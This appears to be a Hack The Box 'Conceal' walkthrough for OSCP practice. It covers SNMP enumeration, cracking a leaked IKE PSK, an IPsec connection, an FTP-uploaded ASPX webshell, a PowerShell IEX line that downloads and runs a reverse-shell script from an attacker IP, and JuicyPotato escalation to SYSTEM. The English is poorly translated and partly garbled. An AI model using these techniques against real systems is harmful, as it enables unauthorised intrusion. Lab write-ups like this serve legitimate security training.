OSCP PREPROTİONS – HTB Conceal

Conceal machine is a vulnerable machine with Windows operating system among retired machines and it is expected to obtain user and rootflags using these vulnerabilities.
We perform a network scan with nmap to recognize the target system.
Classic Scan

Full Port Scan

As a result of the port scan, I encountered a very late scan of theatcp ports, and we found that the “61/udpsnmp, 500/udpisakmp” ports were open on the udp ports.
We start a scan again with nmap to see the details of ports 61, 500.
nmap -A 10.10.10.10.116 -sU -p 61, 500

Here we have seen the details of the ports.
Let’s start with Snmp, port 161.

During enumeration we encountered IKE VPN password.
IKE VPN password PSK – 9C8B1A372B1878851BE2C097031B6E43
This looks like a hash value, let’s try to break it.
We broke it at Hashes.com

9c8b1a372b1878851be2c097031b6e43:Dudecake1!
We have detected it, we note this and move on.
Now provide enumeration on port 500
(ISAKMP (Internet Security Association and Key Management Protocol); by default port 500 is used by Internet keyexcahnge (IKE), which occurs during the establishment of secure VPN tunnels. Users of VPN servers and clients may encounter this port).
https://book.hacktricks.xyz/network-services-pentesting/ipsec-ike-vpn-pentesting
enumeration with reference to the address.
We use the ike-scan tool

Here it is;

  • IKE is encrypted with 3DES
  • Auth is provided with PSK
  • IKE v1 is reaching

Now let’s make an IPsec connection using this information.
Ipsec
Various protocols are used that have been developed according to the requirements of VPN connections. These protocols include IPsec, L2TP, OpenVPN, SSTP, IKEv2, PPTP, etc. In general, openvon and IPsec are used. Since IPsec is expected on this machine, we will discuss IPsec in detail. IPsec VPN provides a framework for securing data at the IP layer and refers to protocols designed to provide this security through authentication and encryption of IP network packets. IPsec defines the encryption algorithms used to encrypt, decrypt and authenticate IP packets.
IPsec first defined two mechanisms to ensure security in IP packets. It uses the Encapsulating Security Payload (ESP) protocol, a way to encrypt data in IP packets, and the AuthenticationHeader (AH) protocol, a way to digitally sign IP packets, and the Internet KeyEschange (IKE) protocol to manage the cryptographic keys used by Ipsec servers.

The main use of VPN is to protect network data, using tunneling to establish connections between two endpoints where the data transmitted is encrypted. IPsec additionally protects network data by encrypting it at the application layer and securing router features that are transmitted over the public internet. Protection can be provided at the application layer without IPsec, for example by encrypting https or TLS protocols instead of http. However, when encryption and authentication are used at higher layers, lower protocols are threatened.
IPsec can also be used in IPv4 and IPv6. The IP header is included, which appears here as IP heder extensions when a system uses IPsec).

Now let’s provide IPsec connection to connect to this machine
First we build Strongswan

Then we install the configuration files.
Let’s edit “/etc/ipsec.conf” and “/etc/ipsec.secrets” files.

/etc/ipsec.conf

ipsec.secrets

After editing these files, I run IPsec and provide connection

Then we scan the target system again with nmap over the IPsecvpn connection (it should not be filtered in this scan)

We provide enumeration on these ports.
21 ftp
We made a connection on the Anonymous side. We got nothing.

We continue on port 80

Let’s scan hidden files and directories with gobuster where we have the Classic default IIS address.

We have the Upload directory, let’s examine it.

Here’s the blank page, let’s see if it comes here if we upload it via ftp.

I uploaded the Muhammed.txt file and let’s see if we can run it.

Will we be able to read the contents of the file and immediately add bkalımaspxshell?

We were able to add Shell.

Here we obtained a shell from the user conceal\destitute and I will use Invoke-PowerShellTcp.ps1 to get an interactive shell.
First I’m going to create a web server with python and give it access to this file
powershelliex(New-Object Net.Webclient).downloadstring(‘http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1’)
command to retrieve the file

Then we obtained our shell of our conceal\destitute user from port 4747 that I listened to

We obtained the user flag but we could not access the administrator user in any way.
We provide localenumeration.
We ran the systeminfo command

Here we see that there is a juicypatato vulnerability.
Let’s use this
First, let’s create a shell with msfvenom, then we pass and run the shell and juciypatayou that we have filled

Now we transmit both shellhemdujuicypatato

Now we listen with nc before running juicypatoato
nc -lvnp443

This way we got shell on the system user

We got our rootflag.